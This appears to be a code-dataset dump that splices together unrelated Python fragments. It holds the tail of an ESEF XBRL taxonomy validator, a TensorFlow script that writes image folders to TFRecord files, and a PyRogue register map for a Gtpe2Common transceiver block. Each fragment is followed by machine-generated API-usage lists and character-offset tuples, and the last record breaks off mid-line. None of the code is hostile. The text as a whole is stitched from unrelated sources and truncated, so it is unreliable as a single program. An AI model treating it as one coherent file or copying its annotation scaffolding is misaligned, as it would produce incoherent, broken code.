modelObject=tuplesInExtTxmy, concepts=", ".join(str(c.qname) for c in tuplesInExtTxmy))
if typedDimsInExtTxmy:
val.modelXbrl.warning("esma.3.2.3.typedDimensionDefinitionInExtensionTaxonomy",
_("Extension taxonomy SHOULD NOT define typed dimensions: %(concepts)s."),
modelObject=typedDimsInExtTxmy, concepts=", ".join(str(c.qname) for c in typedDimsInExtTxmy))
if domainMembersWrongType:
val.modelXbrl.error("esma.3.2.2.domainMemberWrongDataType",
_("Domain members MUST have domainItemType data type as defined in \"http://www.xbrl.org/dtr/type/nonNumeric-2009-12-16.xsd\": concept %(concepts)s."),
modelObject=domainMembersWrongType, concepts=", ".join(str(c.qname) for c in domainMembersWrongType))
if extLineItemsWithoutHypercube:
val.modelXbrl.error("esma.3.4.1.extensionTaxonomyLineItemNotLinkedToAnyHypercube",
_("Line items that do not require any dimensional information to tag data MUST be linked to \"Line items not dimensionally qualified\" hypercube in http://www.esma.europa.eu/xbrl/esef/role/esef_role-999999 declared in esef_cor.xsd: concept %(concepts)s."),
modelObject=extLineItemsWithoutHypercube, concepts=", ".join(str(c.qname) for c in extLineItemsWithoutHypercube))
if extAbstractConcepts:
val.modelXbrl.warning("esma.3.2.5.abstractConceptDefinitionInExtensionTaxonomy",
_("Extension taxonomy SHOULD NOT define abstract concepts: concept %(concepts)s."),
modelObject=extAbstractConcepts, concepts=", ".join(str(c.qname) for c in extAbstractConcepts))
embeddedLinkbaseElements = [e
for e in modelDocument.xmlRootElement.iterdescendants(tag="{http://www.xbrl.org/2003/linkbase}linkbase")
if isinstance(e,ModelObject)]
if embeddedLinkbaseElements:
val.modelXbrl.error("esma.3.1.1.linkbasesNotSeparateFiles",
_("Each linkbase type SHOULD be provided in a separate linkbase file, but a linkbase was found in %(schema)s."),
modelObject=embeddedLinkbaseElements, schema=modelDocument.basename)
if (modelDocument.type == ModelDocument.Type.LINKBASE and
(modelDocument.uri.startswith(val.modelXbrl.uriDir) or
not any(modelDocument.uri.startswith(standardTaxonomyURI) for standardTaxonomyURI in standardTaxonomyURIs))):
linkbasesFound = set()
for linkEltName in ("labelLink", "presentationLink", "calculationLink", "definitionLink"):
for linkElt in modelDocument.xmlRootElement.iterdescendants(tag="{http://www.xbrl.org/2003/linkbase}" + linkEltName):
if linkEltName == "labelLink":
val.hasExtensionLbl = True
linkbasesFound.add(linkEltName)
if linkEltName == "presentationLink":
val.hasExtensionPre = True
linkbasesFound.add(linkEltName)
if linkEltName == "calculationLink":
val.hasExtensionCal = True
linkbasesFound.add(linkEltName)
if linkEltName == "definitionLink":
val.hasExtensionDef = True
linkbasesFound.add(linkEltName)
if len(linkbasesFound) > 1:
val.modelXbrl.error("esma.3.1.1.extensionTaxonomyWrongFilesStructure",
_("Each linkbase type SHOULD be provided in a separate linkbase file, found: %(linkbasesFound)s."),
modelObject=modelDocument.xmlRootElement, linkbasesFound=", ".join(sorted(linkbasesFound)))
# check for any prohibiting dimensionArc's
for prohibitingArcElt in modelDocument.xmlRootElement.iterdescendants(tag="{http://www.xbrl.org/2003/linkbase}definitionArc"):
if (prohibitingArcElt.get("use") == "prohibited" and
prohibitingArcElt.get("{http://www.w3.org/1999/xlink}arcrole") == XbrlConst.dimensionDefault):
val.modelXbrl.error("esma.3.4.3.extensionTaxonomyOverridesDefaultMembers",
_("The extension taxonomy MUST not modify (prohibit and/or override) default members assigned to dimensions by the ESEF taxonomy."),
modelObject=modelDocument.xmlRootElement, linkbasesFound=", ".join(sorted(linkbasesFound)))
|
[
"re.findall",
"re.sub"
] |
[((2994, 3061), 're.findall', 're.findall', (['"""((\\\\w+\')+\\\\w+)|(A[.-])|([.-]A(?=\\\\W|$))|(\\\\w+)"""', 'label'], {}), '("((\\\\w+\')+\\\\w+)|(A[.-])|([.-]A(?=\\\\W|$))|(\\\\w+)", label)\n', (3004, 3061), False, 'import re\n'), ((2882, 2931), 're.sub', 're.sub', (['"""[\'.-]"""', '""""""', '(w[0] or w[2] or w[3] or w[4])'], {}), '("[\'.-]", \'\', w[0] or w[2] or w[3] or w[4])\n', (2888, 2931), False, 'import re\n')]
|
import argparse
import os
from multiprocessing import Process
import tensorflow as tf
from tqdm import tqdm
class Converter:
'''
Converter class for scanning input directory for classes and automatic conversion to TFRecords.
The resultant TFRecord stores the height, width, channels, associated label (inferred from directory) and the raw image in binary format
'''
@staticmethod
def _bytes_feature(value):
if isinstance(value, type(tf.constant(0))):
value = value.numpy()
return tf.train.Feature(bytes_list=tf.train.BytesList(value=[value]))
@staticmethod
def _int64_feature(value):
return tf.train.Feature(int64_list=tf.train.Int64List(value=[value]))
def _image_example(self, path, label, _resize=None, maintain_aspect_ratio=False, _grayscale=False):
image = tf.io.read_file(path)
loaded_image = tf.image.decode_image(image, channels=3)
if _resize is not None:
loaded_image = tf.image.resize(loaded_image, _resize, preserve_aspect_ratio=maintain_aspect_ratio)
if _grayscale:
loaded_image = tf.image.rgb_to_grayscale(loaded_image)
image_shape = loaded_image.shape
feature = {
'height': self._int64_feature(image_shape[0]),
'width': self._int64_feature(image_shape[1]),
'channels': self._int64_feature(image_shape[2]),
'label': self._bytes_feature(label) if isinstance(label.numpy(), bytes) else self._int64_feature(label),
'image_raw': self._bytes_feature(tf.io.encode_jpeg(tf.cast(loaded_image, tf.uint8))),
}
return tf.train.Example(features=tf.train.Features(feature=feature)).SerializeToString()
@staticmethod
def _get_paths(directory):
sub_dirs = tf.io.gfile.glob(f'{directory}/*')
class_names = [os.path.basename(i) for i in sub_dirs]
image_list, label_list = [], []
for class_num, i in enumerate(sub_dirs):
images = tf.io.gfile.glob(f'{i}/*')
labels = [class_names[class_num]] * (len(images)) if class_names else [class_num] * (len(images))
image_list.extend(images)
label_list.extend(labels)
return tf.constant(image_list), tf.constant(label_list)
def _writer(self, index, file_name, num_images_per_file, images, labels, *args):
with tf.io.TFRecordWriter(file_name) as writer:
index_start, index_stop = index * num_images_per_file, (index + 1) * num_images_per_file
# If another batch is possible then process normally otherwise process till the end of the list
if index_stop + num_images_per_file <= len(images):
for image_string, label in tqdm(
zip(images[index_start:index_stop], labels[index_start:index_stop])):
writer.write(self._image_example(image_string, label, *args))
else:
for image_string, label in tqdm(zip(images[index_start:], labels[index_start:])):
writer.write(self._image_example(image_string, label, *args))
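    # Sharding example (illustrative): with 10 images across 3 files,
    # num_images_per_file == 3, so shards cover indices [0:3], [3:6] and [6:];
    # the final shard absorbs the remainder.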
def write_tfrecord(self, num_tfrecords, directory_path, out_dir, *args):
'''
This function requires a path to a directory with multiple
subdirectories having images arranged in classes.
The directories should be in the form of
External dir
|-- dir A
|-- img 1
|-- img 2
|-- dir B
|-- img 1
|-- img 2
        num_tfrecords: Number of TFRecord shard files to create
        directory_path: Path to External (outermost) directory
        out_dir: (Optional) Directory the TFRecord files are written to
        args: Arguments for augmentation (resize, aspect ratio, grayscale)
'''
file_names = [f"{out_dir}/{i}.tfrecord" if out_dir else f"{i}.tfrecord" for i in range(num_tfrecords)]
images, labels = self._get_paths(directory_path)
num_images_per_file = len(images) // len(file_names)
for index, file_name in enumerate(file_names):
self._writer(index, file_name, num_images_per_file, images, labels, *args)
print(f"Finished writing {len(images)} images")
def write_parallely(self, num_tfrecords, directory_path, out_dir, *args):
'''
This function requires a path to a directory with multiple
subdirectories having images arranged in classes.
The directories should be in the form of
External dir
|-- dir A
|-- img 1
|-- img 2
|-- dir B
|-- img 1
|-- img 2
        num_tfrecords: Number of TFRecord shard files to create
        directory_path: Path to External (outermost) directory
        out_dir: (Optional) Directory the TFRecord files are written to
        args: Arguments for augmentation (resize, aspect ratio, grayscale)
'''
file_names = [f"{out_dir}/{i}.tfrecord" if out_dir else f"{i}.tfrecord" for i in range(num_tfrecords)]
images, labels = self._get_paths(directory_path)
num_images_per_file = len(images) // len(file_names)
processes = [Process(target=self._writer,
args=(i, j, num_images_per_file, images, labels, *args)) for i, j
in
enumerate(file_names)]
for p in processes:
p.start()
for p in processes:
p.join()
print(f"Finished writing {len(images)} images")
if __name__ == '__main__':
def is_dir(string):
if os.path.isdir(string):
return string
else:
raise NotADirectoryError(string)
parser = argparse.ArgumentParser()
parser.add_argument('-p', '--path', type=is_dir, required=True,
help="Path to directory containing image directories")
parser.add_argument('--num_tfrecords', type=int, help="Number of TFRecord files to be created", default=1)
parser.add_argument('--out_dir', type=is_dir, help="Path for directory where TFRecord files will be stored")
parser.add_argument('--run_parallely', dest='run_parallely', help="Use multi-processing for operations",
action='store_true')
parser.add_argument('--resize',
help='Resize list input in the form of `height, width`. Example: --resize 300,400', type=str)
parser.add_argument('--maintain_aspect_ratio', dest='maintain_aspect_ratio', help="Maintains aspect ratio",
action='store_true')
    parser.add_argument('--grayscale', dest='grayscale', help="Converts images to grayscale",
action='store_true')
arguments = parser.parse_args()
    resize = tf.constant([int(item) for item in arguments.resize.split(',')], tf.int32) if arguments.resize else None
converter = Converter()
if arguments.run_parallely:
converter.write_parallely(arguments.num_tfrecords, arguments.path, arguments.out_dir, resize,
arguments.maintain_aspect_ratio, arguments.grayscale)
else:
converter.write_tfrecord(arguments.num_tfrecords, arguments.path, arguments.out_dir, resize,
arguments.maintain_aspect_ratio, arguments.grayscale)
|
[
"tensorflow.train.BytesList",
"tensorflow.image.rgb_to_grayscale",
"argparse.ArgumentParser",
"tensorflow.train.Int64List",
"os.path.basename",
"os.path.isdir",
"tensorflow.io.TFRecordWriter",
"tensorflow.train.Features",
"tensorflow.constant",
"tensorflow.cast",
"tensorflow.image.decode_image",
"tensorflow.io.read_file",
"multiprocessing.Process",
"tensorflow.image.resize",
"tensorflow.io.gfile.glob"
] |
[((5766, 5791), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {}), '()\n', (5789, 5791), False, 'import argparse\n'), ((848, 869), 'tensorflow.io.read_file', 'tf.io.read_file', (['path'], {}), '(path)\n', (863, 869), True, 'import tensorflow as tf\n'), ((893, 933), 'tensorflow.image.decode_image', 'tf.image.decode_image', (['image'], {'channels': '(3)'}), '(image, channels=3)\n', (914, 933), True, 'import tensorflow as tf\n'), ((1799, 1833), 'tensorflow.io.gfile.glob', 'tf.io.gfile.glob', (['f"""{directory}/*"""'], {}), "(f'{directory}/*')\n", (1815, 1833), True, 'import tensorflow as tf\n'), ((5643, 5664), 'os.path.isdir', 'os.path.isdir', (['string'], {}), '(string)\n', (5656, 5664), False, 'import os\n'), ((993, 1081), 'tensorflow.image.resize', 'tf.image.resize', (['loaded_image', '_resize'], {'preserve_aspect_ratio': 'maintain_aspect_ratio'}), '(loaded_image, _resize, preserve_aspect_ratio=\n maintain_aspect_ratio)\n', (1008, 1081), True, 'import tensorflow as tf\n'), ((1127, 1166), 'tensorflow.image.rgb_to_grayscale', 'tf.image.rgb_to_grayscale', (['loaded_image'], {}), '(loaded_image)\n', (1152, 1166), True, 'import tensorflow as tf\n'), ((1857, 1876), 'os.path.basename', 'os.path.basename', (['i'], {}), '(i)\n', (1873, 1876), False, 'import os\n'), ((2007, 2033), 'tensorflow.io.gfile.glob', 'tf.io.gfile.glob', (['f"""{i}/*"""'], {}), "(f'{i}/*')\n", (2023, 2033), True, 'import tensorflow as tf\n'), ((2236, 2259), 'tensorflow.constant', 'tf.constant', (['image_list'], {}), '(image_list)\n', (2247, 2259), True, 'import tensorflow as tf\n'), ((2261, 2284), 'tensorflow.constant', 'tf.constant', (['label_list'], {}), '(label_list)\n', (2272, 2284), True, 'import tensorflow as tf\n'), ((2384, 2415), 'tensorflow.io.TFRecordWriter', 'tf.io.TFRecordWriter', (['file_name'], {}), '(file_name)\n', (2404, 2415), True, 'import tensorflow as tf\n'), ((5231, 5320), 'multiprocessing.Process', 'Process', ([], {'target': 'self._writer', 'args': '(i, j, num_images_per_file, images, labels, *args)'}), '(target=self._writer, args=(i, j, num_images_per_file, images,\n labels, *args))\n', (5238, 5320), False, 'from multiprocessing import Process\n'), ((469, 483), 'tensorflow.constant', 'tf.constant', (['(0)'], {}), '(0)\n', (480, 483), True, 'import tensorflow as tf\n'), ((564, 597), 'tensorflow.train.BytesList', 'tf.train.BytesList', ([], {'value': '[value]'}), '(value=[value])\n', (582, 597), True, 'import tensorflow as tf\n'), ((692, 725), 'tensorflow.train.Int64List', 'tf.train.Int64List', ([], {'value': '[value]'}), '(value=[value])\n', (710, 725), True, 'import tensorflow as tf\n'), ((1587, 1618), 'tensorflow.cast', 'tf.cast', (['loaded_image', 'tf.uint8'], {}), '(loaded_image, tf.uint8)\n', (1594, 1618), True, 'import tensorflow as tf\n'), ((1674, 1708), 'tensorflow.train.Features', 'tf.train.Features', ([], {'feature': 'feature'}), '(feature=feature)\n', (1691, 1708), True, 'import tensorflow as tf\n')]
|
#!/usr/bin/env python
#-----------------------------------------------------------------------------
# Title : PyRogue Gtpe2Common
#-----------------------------------------------------------------------------
# File : Gtpe2Common.py
# Created : 2017-04-12
#-----------------------------------------------------------------------------
# Description:
# PyRogue Gtpe2Common
#-----------------------------------------------------------------------------
# This file is part of the rogue software platform. It is subject to
# the license terms in the LICENSE.txt file found in the top-level directory
# of this distribution and at:
# https://confluence.slac.stanford.edu/display/ppareg/LICENSE.html.
# No part of the rogue software platform, including this file, may be
# copied, modified, propagated, or distributed except according to the terms
# contained in the LICENSE.txt file.
#-----------------------------------------------------------------------------
import pyrogue as pr
class Gtpe2Common(pr.Device):
def __init__( self,
name = "Gtpe2Common",
description = "Gtpe2Common",
**kwargs):
super().__init__(name=name, description=description, **kwargs)
##############################
# Variables
##############################
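        # Each variable below maps a field of a 16-bit DRP configuration word;
        # the DRP address is word-indexed, so (addr << 2) gives the byte offset
        # used here (e.g. DRP address 0x0002 -> byte offset 0x8).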
self.add(pr.RemoteVariable(
name = "PLL0_CFG_WRD0",
description = "",
offset = (0x0002<<2),
bitSize = 16,
bitOffset = 0,
base = pr.UInt,
mode = "RW",
))
self.add(pr.RemoteVariable(
name = "PLL0_CFG_WRD1",
description = "",
offset = (0x0003<<2),
bitSize = 11,
bitOffset = 0,
base = pr.UInt,
mode = "RW",
))
self.add(pr.RemoteVariable(
name = "PLL0_REFCLK_DIV",
description = "",
offset = (0x0004<<2),
bitSize = 5,
bitOffset = 9,
base = pr.UInt,
mode = "RW",
))
self.add(pr.RemoteVariable(
name = "PLL0_FBDIV_45",
description = "",
offset = (0x0004<<2),
bitSize = 1,
bitOffset = 7,
base = pr.UInt,
mode = "RW",
))
self.add(pr.RemoteVariable(
name = "PLL0_FBDIV",
description = "",
offset = (0x0004<<2),
bitSize = 6,
bitOffset = 0,
base = pr.UInt,
mode = "RW",
))
self.add(pr.RemoteVariable(
name = "PLL0_LOCK_CFG",
description = "",
offset = (0x0005<<2),
bitSize = 9,
bitOffset = 0,
base = pr.UInt,
mode = "RW",
))
self.add(pr.RemoteVariable(
name = "PLL0_INIT_CFG_WRD0",
description = "",
offset = (0x0006<<2),
bitSize = 16,
bitOffset = 0,
base = pr.UInt,
mode = "RW",
))
self.add(pr.RemoteVariable(
name = "PLL0_INIT_CFG_WRD1",
description = "",
offset = (0x0007<<2),
bitSize = 8,
bitOffset = 0,
base = pr.UInt,
mode = "RW",
))
self.add(pr.RemoteVariable(
name = "RSVD_ATTR0",
description = "",
offset = (0x000A<<2),
bitSize = 16,
bitOffset = 0,
base = pr.UInt,
mode = "RW",
))
self.add(pr.RemoteVariable(
name = "PLL1_DMON_CFG",
description = "",
offset = (0x000F<<2),
bitSize = 1,
bitOffset = 1,
base = pr.UInt,
mode = "RW",
))
self.add(pr.RemoteVariable(
name = "PLL0_DMON_CFG",
description = "",
offset = (0x000F<<2),
bitSize = 1,
bitOffset = 0,
base = pr.UInt,
mode = "RW",
))
self.add(pr.RemoteVariable(
name = "COMMON_CFG_WRD0",
description = "",
offset = (0x0011<<2),
bitSize = 16,
bitOffset = 0,
base = pr.UInt,
mode = "RW",
))
self.add(pr.RemoteVariable(
name = "COMMON_CFG_WRD1",
description = "",
offset = (0x0012<<2),
bitSize = 16,
bitOffset = 0,
base = pr.UInt,
mode = "RW",
))
self.add(pr.RemoteVariable(
name = "PLL_CLKOUT_CFG",
description = "",
offset = (0x0013<<2),
bitSize = 8,
bitOffset = 0,
base = pr.UInt,
mode = "RW",
))
self.add(pr.RemoteVariable(
name = "BIAS_CFG_WRD0",
description = "",
offset = (0x0019<<2),
bitSize = 16,
bitOffset = 0,
base = pr.UInt,
mode = "RW",
))
self.add(pr.RemoteVariable(
name = "BIAS_CFG_WRD1",
description = "",
offset = (0x001A<<2),
bitSize = 16,
bitOffset = 0,
base = pr.UInt,
mode = "RW",
))
self.add(pr.RemoteVariable(
name = "BIAS_CFG_WRD2",
description = "",
offset = (0x001B<<2),
bitSize = 16,
bitOffset = 0,
base = pr.UInt,
mode = "RW",
))
self.add(pr.RemoteVariable(
name = "BIAS_CFG_WRD3",
description = "",
offset = (0x001C<<2),
bitSize = 16,
bitOffset = 0,
base = pr.UInt,
mode = "RW",
))
self.add(pr.RemoteVariable(
name = "RSVD_ATTR1",
description = "",
offset = (0x0024<<2),
bitSize = 16,
bitOffset = 0,
base = pr.UInt,
mode = "RW",
))
self.add(pr.RemoteVariable(
name = "PLL1_INIT_CFG_WRD0",
description = "",
offset = (0x0028<<2),
bitSize = 16,
bitOffset = 0,
base = pr.UInt,
mode = "RW",
))
self.add(pr.RemoteVariable(
name = "PLL1_INIT_CFG_WRD1",
description = "",
offset = (0x0029<<2),
bitSize = 8,
bitOffset = 0,
base = pr.UInt,
mode = "RW",
))
self.add(pr.RemoteVariable(
name = "PLL1_LOCK_CFG",
description = "",
offset = (0x002A<<2),
bitSize = 9,
bitOffset = 0,
base = pr.UInt,
mode = "RW",
))
self.add(pr.RemoteVariable(
name = "PLL1_REFCLK_DIV",
description = "",
offset = (0x002B<<2),
bitSize = 5,
bitOffset = 9,
base = pr.UInt,
mode = "RW",
))
self.add(pr.RemoteVariable(
name = "PLL1_FBDIV_45",
description = "",
offset = (0x002B<<2),
bitSize = 1,
bitOffset = 7,
base = pr.UInt,
mode = "RW",
))
self.add(pr.RemoteVariable(
name = "PLL1_FBDIV",
description = "",
offset = (0x002B<<2),
bitSize = 6,
bitOffset = 0,
base = pr.UInt,
mode = "RW",
))
self.add(pr.RemoteVariable(
name = "PLL1_CFG_WRD0",
description = "",
offset = (0x002C<<2),
bitSize = 16,
bitOffset = 0,
base = pr.UInt,
mode = "RW",
))
self.add(pr.RemoteVariable(
name = "PLL1_CFG_WRD1",
description = "",
offset = (0x002D<<2),
bitSize = 11,
bitOffset = 0,
base = pr.UInt,
mode = "RW",
))
|
[
"pyrogue.RemoteVariable"
] |
[((1356, 1480), 'pyrogue.RemoteVariable', 'pr.RemoteVariable', ([], {'name': '"""PLL0_CFG_WRD0"""', 'description': '""""""', 'offset': '(2 << 2)', 'bitSize': '(16)', 'bitOffset': '(0)', 'base': 'pr.UInt', 'mode': '"""RW"""'}), "(name='PLL0_CFG_WRD0', description='', offset=2 << 2,\n bitSize=16, bitOffset=0, base=pr.UInt, mode='RW')\n", (1373, 1480), True, 'import pyrogue as pr\n'), ((1663, 1787), 'pyrogue.RemoteVariable', 'pr.RemoteVariable', ([], {'name': '"""PLL0_CFG_WRD1"""', 'description': '""""""', 'offset': '(3 << 2)', 'bitSize': '(11)', 'bitOffset': '(0)', 'base': 'pr.UInt', 'mode': '"""RW"""'}), "(name='PLL0_CFG_WRD1', description='', offset=3 << 2,\n bitSize=11, bitOffset=0, base=pr.UInt, mode='RW')\n", (1680, 1787), True, 'import pyrogue as pr\n'), ((1963, 2088), 'pyrogue.RemoteVariable', 'pr.RemoteVariable', ([], {'name': '"""PLL0_REFCLK_DIV"""', 'description': '""""""', 'offset': '(4 << 2)', 'bitSize': '(5)', 'bitOffset': '(9)', 'base': 'pr.UInt', 'mode': '"""RW"""'}), "(name='PLL0_REFCLK_DIV', description='', offset=4 << 2,\n bitSize=5, bitOffset=9, base=pr.UInt, mode='RW')\n", (1980, 2088), True, 'import pyrogue as pr\n'), ((2266, 2389), 'pyrogue.RemoteVariable', 'pr.RemoteVariable', ([], {'name': '"""PLL0_FBDIV_45"""', 'description': '""""""', 'offset': '(4 << 2)', 'bitSize': '(1)', 'bitOffset': '(7)', 'base': 'pr.UInt', 'mode': '"""RW"""'}), "(name='PLL0_FBDIV_45', description='', offset=4 << 2,\n bitSize=1, bitOffset=7, base=pr.UInt, mode='RW')\n", (2283, 2389), True, 'import pyrogue as pr\n'), ((2572, 2693), 'pyrogue.RemoteVariable', 'pr.RemoteVariable', ([], {'name': '"""PLL0_FBDIV"""', 'description': '""""""', 'offset': '(4 << 2)', 'bitSize': '(6)', 'bitOffset': '(0)', 'base': 'pr.UInt', 'mode': '"""RW"""'}), "(name='PLL0_FBDIV', description='', offset=4 << 2, bitSize\n =6, bitOffset=0, base=pr.UInt, mode='RW')\n", (2589, 2693), True, 'import pyrogue as pr\n'), ((2870, 2993), 'pyrogue.RemoteVariable', 'pr.RemoteVariable', ([], {'name': '"""PLL0_LOCK_CFG"""', 'description': '""""""', 'offset': '(5 << 2)', 'bitSize': '(9)', 'bitOffset': '(0)', 'base': 'pr.UInt', 'mode': '"""RW"""'}), "(name='PLL0_LOCK_CFG', description='', offset=5 << 2,\n bitSize=9, bitOffset=0, base=pr.UInt, mode='RW')\n", (2887, 2993), True, 'import pyrogue as pr\n'), ((3169, 3298), 'pyrogue.RemoteVariable', 'pr.RemoteVariable', ([], {'name': '"""PLL0_INIT_CFG_WRD0"""', 'description': '""""""', 'offset': '(6 << 2)', 'bitSize': '(16)', 'bitOffset': '(0)', 'base': 'pr.UInt', 'mode': '"""RW"""'}), "(name='PLL0_INIT_CFG_WRD0', description='', offset=6 << 2,\n bitSize=16, bitOffset=0, base=pr.UInt, mode='RW')\n", (3186, 3298), True, 'import pyrogue as pr\n'), ((3476, 3604), 'pyrogue.RemoteVariable', 'pr.RemoteVariable', ([], {'name': '"""PLL0_INIT_CFG_WRD1"""', 'description': '""""""', 'offset': '(7 << 2)', 'bitSize': '(8)', 'bitOffset': '(0)', 'base': 'pr.UInt', 'mode': '"""RW"""'}), "(name='PLL0_INIT_CFG_WRD1', description='', offset=7 << 2,\n bitSize=8, bitOffset=0, base=pr.UInt, mode='RW')\n", (3493, 3604), True, 'import pyrogue as pr\n'), ((3780, 3902), 'pyrogue.RemoteVariable', 'pr.RemoteVariable', ([], {'name': '"""RSVD_ATTR0"""', 'description': '""""""', 'offset': '(10 << 2)', 'bitSize': '(16)', 'bitOffset': '(0)', 'base': 'pr.UInt', 'mode': '"""RW"""'}), "(name='RSVD_ATTR0', description='', offset=10 << 2,\n bitSize=16, bitOffset=0, base=pr.UInt, mode='RW')\n", (3797, 3902), True, 'import pyrogue as pr\n'), ((4086, 4210), 'pyrogue.RemoteVariable', 'pr.RemoteVariable', ([], {'name': 
'"""PLL1_DMON_CFG"""', 'description': '""""""', 'offset': '(15 << 2)', 'bitSize': '(1)', 'bitOffset': '(1)', 'base': 'pr.UInt', 'mode': '"""RW"""'}), "(name='PLL1_DMON_CFG', description='', offset=15 << 2,\n bitSize=1, bitOffset=1, base=pr.UInt, mode='RW')\n", (4103, 4210), True, 'import pyrogue as pr\n'), ((4386, 4510), 'pyrogue.RemoteVariable', 'pr.RemoteVariable', ([], {'name': '"""PLL0_DMON_CFG"""', 'description': '""""""', 'offset': '(15 << 2)', 'bitSize': '(1)', 'bitOffset': '(0)', 'base': 'pr.UInt', 'mode': '"""RW"""'}), "(name='PLL0_DMON_CFG', description='', offset=15 << 2,\n bitSize=1, bitOffset=0, base=pr.UInt, mode='RW')\n", (4403, 4510), True, 'import pyrogue as pr\n'), ((4694, 4821), 'pyrogue.RemoteVariable', 'pr.RemoteVariable', ([], {'name': '"""COMMON_CFG_WRD0"""', 'description': '""""""', 'offset': '(17 << 2)', 'bitSize': '(16)', 'bitOffset': '(0)', 'base': 'pr.UInt', 'mode': '"""RW"""'}), "(name='COMMON_CFG_WRD0', description='', offset=17 << 2,\n bitSize=16, bitOffset=0, base=pr.UInt, mode='RW')\n", (4711, 4821), True, 'import pyrogue as pr\n'), ((5000, 5127), 'pyrogue.RemoteVariable', 'pr.RemoteVariable', ([], {'name': '"""COMMON_CFG_WRD1"""', 'description': '""""""', 'offset': '(18 << 2)', 'bitSize': '(16)', 'bitOffset': '(0)', 'base': 'pr.UInt', 'mode': '"""RW"""'}), "(name='COMMON_CFG_WRD1', description='', offset=18 << 2,\n bitSize=16, bitOffset=0, base=pr.UInt, mode='RW')\n", (5017, 5127), True, 'import pyrogue as pr\n'), ((5303, 5428), 'pyrogue.RemoteVariable', 'pr.RemoteVariable', ([], {'name': '"""PLL_CLKOUT_CFG"""', 'description': '""""""', 'offset': '(19 << 2)', 'bitSize': '(8)', 'bitOffset': '(0)', 'base': 'pr.UInt', 'mode': '"""RW"""'}), "(name='PLL_CLKOUT_CFG', description='', offset=19 << 2,\n bitSize=8, bitOffset=0, base=pr.UInt, mode='RW')\n", (5320, 5428), True, 'import pyrogue as pr\n'), ((5605, 5730), 'pyrogue.RemoteVariable', 'pr.RemoteVariable', ([], {'name': '"""BIAS_CFG_WRD0"""', 'description': '""""""', 'offset': '(25 << 2)', 'bitSize': '(16)', 'bitOffset': '(0)', 'base': 'pr.UInt', 'mode': '"""RW"""'}), "(name='BIAS_CFG_WRD0', description='', offset=25 << 2,\n bitSize=16, bitOffset=0, base=pr.UInt, mode='RW')\n", (5622, 5730), True, 'import pyrogue as pr\n'), ((5908, 6033), 'pyrogue.RemoteVariable', 'pr.RemoteVariable', ([], {'name': '"""BIAS_CFG_WRD1"""', 'description': '""""""', 'offset': '(26 << 2)', 'bitSize': '(16)', 'bitOffset': '(0)', 'base': 'pr.UInt', 'mode': '"""RW"""'}), "(name='BIAS_CFG_WRD1', description='', offset=26 << 2,\n bitSize=16, bitOffset=0, base=pr.UInt, mode='RW')\n", (5925, 6033), True, 'import pyrogue as pr\n'), ((6227, 6352), 'pyrogue.RemoteVariable', 'pr.RemoteVariable', ([], {'name': '"""BIAS_CFG_WRD2"""', 'description': '""""""', 'offset': '(27 << 2)', 'bitSize': '(16)', 'bitOffset': '(0)', 'base': 'pr.UInt', 'mode': '"""RW"""'}), "(name='BIAS_CFG_WRD2', description='', offset=27 << 2,\n bitSize=16, bitOffset=0, base=pr.UInt, mode='RW')\n", (6244, 6352), True, 'import pyrogue as pr\n'), ((6530, 6655), 'pyrogue.RemoteVariable', 'pr.RemoteVariable', ([], {'name': '"""BIAS_CFG_WRD3"""', 'description': '""""""', 'offset': '(28 << 2)', 'bitSize': '(16)', 'bitOffset': '(0)', 'base': 'pr.UInt', 'mode': '"""RW"""'}), "(name='BIAS_CFG_WRD3', description='', offset=28 << 2,\n bitSize=16, bitOffset=0, base=pr.UInt, mode='RW')\n", (6547, 6655), True, 'import pyrogue as pr\n'), ((6836, 6958), 'pyrogue.RemoteVariable', 'pr.RemoteVariable', ([], {'name': '"""RSVD_ATTR1"""', 'description': '""""""', 'offset': '(36 << 2)', 
'bitSize': '(16)', 'bitOffset': '(0)', 'base': 'pr.UInt', 'mode': '"""RW"""'}), "(name='RSVD_ATTR1', description='', offset=36 << 2,\n bitSize=16, bitOffset=0, base=pr.UInt, mode='RW')\n", (6853, 6958), True, 'import pyrogue as pr\n'), ((7137, 7267), 'pyrogue.RemoteVariable', 'pr.RemoteVariable', ([], {'name': '"""PLL1_INIT_CFG_WRD0"""', 'description': '""""""', 'offset': '(40 << 2)', 'bitSize': '(16)', 'bitOffset': '(0)', 'base': 'pr.UInt', 'mode': '"""RW"""'}), "(name='PLL1_INIT_CFG_WRD0', description='', offset=40 << 2,\n bitSize=16, bitOffset=0, base=pr.UInt, mode='RW')\n", (7154, 7267), True, 'import pyrogue as pr\n'), ((7447, 7576), 'pyrogue.RemoteVariable', 'pr.RemoteVariable', ([], {'name': '"""PLL1_INIT_CFG_WRD1"""', 'description': '""""""', 'offset': '(41 << 2)', 'bitSize': '(8)', 'bitOffset': '(0)', 'base': 'pr.UInt', 'mode': '"""RW"""'}), "(name='PLL1_INIT_CFG_WRD1', description='', offset=41 << 2,\n bitSize=8, bitOffset=0, base=pr.UInt, mode='RW')\n", (7464, 7576), True, 'import pyrogue as pr\n'), ((7753, 7877), 'pyrogue.RemoteVariable', 'pr.RemoteVariable', ([], {'name': '"""PLL1_LOCK_CFG"""', 'description': '""""""', 'offset': '(42 << 2)', 'bitSize': '(9)', 'bitOffset': '(0)', 'base': 'pr.UInt', 'mode': '"""RW"""'}), "(name='PLL1_LOCK_CFG', description='', offset=42 << 2,\n bitSize=9, bitOffset=0, base=pr.UInt, mode='RW')\n", (7770, 7877), True, 'import pyrogue as pr\n'), ((8078, 8204), 'pyrogue.RemoteVariable', 'pr.RemoteVariable', ([], {'name': '"""PLL1_REFCLK_DIV"""', 'description': '""""""', 'offset': '(43 << 2)', 'bitSize': '(5)', 'bitOffset': '(9)', 'base': 'pr.UInt', 'mode': '"""RW"""'}), "(name='PLL1_REFCLK_DIV', description='', offset=43 << 2,\n bitSize=5, bitOffset=9, base=pr.UInt, mode='RW')\n", (8095, 8204), True, 'import pyrogue as pr\n'), ((8381, 8505), 'pyrogue.RemoteVariable', 'pr.RemoteVariable', ([], {'name': '"""PLL1_FBDIV_45"""', 'description': '""""""', 'offset': '(43 << 2)', 'bitSize': '(1)', 'bitOffset': '(7)', 'base': 'pr.UInt', 'mode': '"""RW"""'}), "(name='PLL1_FBDIV_45', description='', offset=43 << 2,\n bitSize=1, bitOffset=7, base=pr.UInt, mode='RW')\n", (8398, 8505), True, 'import pyrogue as pr\n'), ((8687, 8808), 'pyrogue.RemoteVariable', 'pr.RemoteVariable', ([], {'name': '"""PLL1_FBDIV"""', 'description': '""""""', 'offset': '(43 << 2)', 'bitSize': '(6)', 